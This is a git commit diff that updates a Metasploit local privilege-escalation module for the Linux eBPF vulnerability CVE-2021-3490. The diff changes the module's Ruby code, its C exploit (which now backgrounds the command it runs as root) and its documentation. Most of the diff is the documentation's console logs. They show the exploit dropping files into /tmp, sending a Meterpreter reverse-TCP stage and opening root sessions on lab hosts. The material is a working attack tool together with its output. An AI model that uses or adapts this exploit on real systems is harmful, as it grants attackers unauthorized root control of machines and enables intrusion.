Update exploit code to use & after the command to execute as root so it executes in the background and doesn't hang Metasploit. Also update the logic of the code to check the response from executing the exploit and respond accordingly and update the documentation to match
This commit is contained in:
parent
6f9b06fb4b
commit
3bca3b0bcb
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -202,9 +202,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -232,7 +233,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.802fke5' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.75mogl0Vz6' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.221
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.802fke5
|
||||
[+] Deleted /tmp/.75mogl0Vz6
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.221:42170) at 2021-08-17 17:40:19 -0500
|
||||
|
@ -317,9 +321,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -346,13 +351,18 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Started reverse TCP handler on 192.168.224.128:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Writing '/tmp/.8lHII9pIja' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.x3iDbm3J' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[*] Writing '/tmp/.T0AUoK' (39400 bytes) ...
|
||||
[*] Writing '/tmp/.R3N8FO' (250 bytes) ...
|
||||
[*] Launching exploit...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 9000 seconds are up.
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.220
|
||||
[+] Deleted /tmp/.8lHII9pIja
|
||||
[+] Deleted /tmp/.x3iDbm3J
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.220:47878) at 2021-08-17 17:53:36 -0500
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.T0AUoK
|
||||
[+] Deleted /tmp/.R3N8FO
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.220:47914) at 2021-08-31 14:58:43 -0500
|
||||
|
||||
meterpreter >
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.224.220
|
||||
|
@ -422,9 +432,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -454,7 +465,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.RyfMnlY' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.7JmBQ1nu58' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.222
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.RyfMnlY
|
||||
[+] Deleted /tmp/.7JmBQ1nu58
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.222:48204) at 2021-08-19 14:17:12 -0500
|
||||
|
@ -544,9 +558,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -576,7 +591,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.VBiCx' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.KqjrGX5' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.223
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.VBiCx
|
||||
[+] Deleted /tmp/.KqjrGX5
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:54884) at 2021-08-20 13:33:38 -0500
|
||||
|
@ -679,9 +697,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION 1 yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION 1 yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -709,7 +728,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.6y6Ws' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.SYYFfC' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.223
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.6y6Ws
|
||||
[+] Deleted /tmp/.SYYFfC
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:37368) at 2021-08-20 14:47:44 -0500
|
||||
|
@ -750,9 +772,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION 1 yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION 1 yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -786,8 +809,11 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.RRaKt' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.yYaQKj' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.223
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.RRaKt
|
||||
[+] Deleted /tmp/.yYaQKj
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:60752) at 2021-08-20 16:34:42 -0500
|
||||
|
@ -839,9 +865,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -893,7 +920,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.dFIC3w' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.sYuymmhR3Y' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.223
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.dFIC3w
|
||||
[+] Deleted /tmp/.sYuymmhR3Y
|
||||
[*] Meterpreter session 2 opened (192.168.224.128:4444 -> 192.168.224.223:53154) at 2021-08-20 18:02:58 -0500
|
||||
|
@ -949,9 +979,10 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > show optio
|
|||
|
||||
Module options (exploit/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
SESSION 1 yes The session to run this module on.
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CmdTimeout 120 yes Maximum number of seconds to wait for the exploit to complete
|
||||
SESSION 1 yes The session to run this module on.
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
@ -983,8 +1014,11 @@ msf6 exploit(linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe) > exploit
|
|||
[*] Writing '/tmp/.TGPokxM' (39352 bytes) ...
|
||||
[*] Writing '/tmp/.RM7G8l5CtW' (250 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[!] Note that things may appear to hang due to the exploit not exiting.
|
||||
[!] Feel free to press CTRL+C if the shell is returned before 200 seconds are up.
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3012548 bytes) to 192.168.224.224
|
||||
[+] Exploit completed successfully, shell should be returning soon!
|
||||
[+] Deleted /tmp/.TGPokxM
|
||||
[+] Deleted /tmp/.RM7G8l5CtW
|
||||
[*] Meterpreter session 3 opened (192.168.224.128:6644 -> 192.168.224.224:45650) at 2021-08-23 14:50:52 -0500
|
||||
|
|
|
@ -573,7 +573,10 @@ int main(int argc, char **argv)
|
|||
}
|
||||
|
||||
printf("[+] success! enjoy r00t :)\n");
|
||||
system(argv[1]);
|
||||
char stringToExecute[9000];
|
||||
strcpy(stringToExecute, argv[1]);
|
||||
strcat(stringToExecute, " &");
|
||||
system(stringToExecute);
|
||||
|
||||
done:
|
||||
cleanup(&ctx);
|
||||
|
|
|
@ -71,9 +71,11 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
register_options([
|
||||
OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 120])
|
||||
])
|
||||
register_advanced_options([
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
|
||||
OptInt.new('CmdTimeout', [true, 'Maximum number of seconds to wait for the exploit to complete', 200])
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
|
||||
])
|
||||
end
|
||||
|
||||
|
@ -203,7 +205,17 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
register_file_for_cleanup(payload_path)
|
||||
|
||||
# Launch exploit
|
||||
print_status('Launching exploit ...')
|
||||
cmd_exec(executable_path.to_s, payload_path.to_s, datastore['CmdTimeout'])
|
||||
print_status('Launching exploit...')
|
||||
print_warning('Note that things may appear to hang due to the exploit not exiting.')
|
||||
print_warning("Feel free to press CTRL+C if the shell is returned before #{datastore['CmdTimeout']} seconds are up.")
|
||||
response = cmd_exec(executable_path.to_s, payload_path.to_s, datastore['CmdTimeout'])
|
||||
if response =~ /fail/
|
||||
fail_with(Failure::NoTarget, 'The exploit failed! Check to see if you are running this against the right target and kernel version!')
|
||||
vprint_error("The response was: #{response}")
|
||||
elsif response =~ /success\!/
|
||||
print_good('Exploit completed successfully, shell should be returning soon!')
|
||||
else
|
||||
print_status('No indication of exploit success or failure, try increasing CmdTimeout value!')
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue